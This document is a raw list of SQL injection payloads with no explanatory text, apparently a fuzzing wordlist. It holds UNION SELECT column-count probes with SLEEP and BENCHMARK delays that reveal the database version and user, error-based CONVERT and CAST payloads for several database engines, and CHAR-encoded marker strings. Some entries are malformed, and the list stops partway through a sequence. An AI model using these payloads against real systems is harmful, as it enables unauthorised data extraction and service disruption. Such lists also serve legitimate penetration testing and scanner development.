UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),"'3
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
|
||||||
|
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
|
||||||
|
UNION ALL SELECT USER()--
|
||||||
|
UNION ALL SELECT SLEEP(5)--
|
||||||
|
UNION ALL SELECT USER(),SLEEP(5)--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||||
|
UNION ALL SELECT NULL--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
|
||||||
|
UNION ALL SELECT NULL#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
|
||||||
|
UNION ALL SELECT NULL
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
|
||||||
|
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
|
||||||
|
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
|
||||||
|
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
|
||||||
|
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
||||||
|
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
|
||||||
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
|
||||||
|
